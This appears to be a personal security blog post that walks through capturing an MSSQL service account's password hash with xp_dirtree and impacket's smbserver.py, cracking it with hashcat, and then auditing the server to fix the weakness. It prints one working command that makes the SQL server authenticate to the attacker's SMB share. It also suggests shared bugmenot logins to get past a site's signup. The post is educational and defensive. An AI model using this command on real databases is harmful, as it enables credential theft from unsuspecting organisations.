How to capture MSSQL credentials with xp_dirtree, smbserver.py and fix common MSSQL issues by @_markmo_
In security, we must show people how things can be misused before they take a threat seriously. Please note, this attack is not new, but it is new to me and I wanted to share what I learned as well as how to fix it.
First start smbserver.py (found here: https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py)
I setup a sample service account on a local machine to run my SQL process. DBA’s often use service accounts because they want the to be able to access a shared network drive. This is where things get REALLY INTERESTING!!!
Now I’ll connect with my local “Security” account. Tt really doesn’t matter which account I use, if the xp_dirtree is marked as PUBLIC, anyone can run this. Here is the cool part. It will run the command with the security context of the service account running the SQL server process!! So that’s the hash we will capture! My user account may not have awesome rights on the database, but the service account (SVC_MySvcAcct) I’m running does! Here is the command if you can’t read it from the image: EXEC master.sys.xp_dirtree ‘\\10.10.10.154\myshare’,1, 1
Once the command is executed we’ve captured our hash on our Kali box and it is the service account!
Now we write the hash to a file
and crack it with hashcat
Here is the password of the service account running my SQL server
How do we identify the problem and fix it? There is a fantastic free SQL audit script from SQL Server Central by Rudy Panigas here: http://www.sqlservercentral.com/articles/Audit/136459/ If you don’t want to sign up on SQL server central to download the script you “could” try this URL to get a password. http://bugmenot.com/view/sqlservercentral.com
Once you run it you will get some great output for your DBA. I ran this on a brand-new installation, so these values are defaults. At the top it shows what it checks for.
At the bottom, it shows the issues that need review.
In the middle it tells the DBA how and why tofix the issues it identifies.
When time permits I’ll do a write up on other insecure settings in SQL. I hope this finds you with a smile. Follow me on twitter @_markmo_